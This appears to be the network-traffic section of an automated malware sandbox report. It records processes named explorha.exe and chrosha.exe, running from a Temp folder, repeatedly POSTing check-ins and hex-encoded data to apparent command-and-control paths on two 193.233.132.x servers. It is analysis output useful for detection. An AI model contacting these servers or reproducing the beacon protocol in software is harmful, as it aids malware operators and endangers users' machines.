                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.739223003 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                                                                      1041        192.168.2.5  50895        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.665656090 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:45.914567947 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                                                                      1042        192.168.2.5  50896        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.105317116 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.354285002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                                                                      1043        192.168.2.5  50897        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.161844969 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.410968065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                                                                      1044        192.168.2.5  50898        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.606901884 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.860388041 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                                                                      1045        192.168.2.5  50899        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:46.774112940 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.020931005 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                                                                                                      1046        192.168.2.5  50900        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:47.227557898 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:47.472685099 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1047 | 192.168.2.5 | 50901 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:47.274974108 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:47.526151896 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1048 | 192.168.2.5 | 50902 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:47.727989912 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:47.982733965 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1049 | 192.168.2.5 | 50903 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:47.879359961 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:48.122843027 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1050 | 192.168.2.5 | 50904 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:48.357394934 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:34:48.608165979 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1051 | 192.168.2.5 | 50905 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:48.374752998 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:48.626183033 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1052 | 192.168.2.5 | 50906 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:48.866621971 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:49.124429941 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:34:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1053 | 192.168.2.5 | 50907 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:48.980145931 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:49.224848032 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1054 | 192.168.2.5 | 50908 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:49.480621099 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:49.736601114 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1055 | 192.168.2.5 | 50909 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:49.480627060 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:49.724203110 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1056 | 192.168.2.5 | 50910 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:49.982727051 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:50.237401009 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1057 | 192.168.2.5 | 50911 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:50.104626894 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:50.350965977 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1058 | 192.168.2.5 | 50912 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:50.602591991 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:50.848377943 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1059 | 192.168.2.5 | 50913 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:50.605102062 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:50.857984066 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1060 | 192.168.2.5 | 50914 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:51.096148014 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
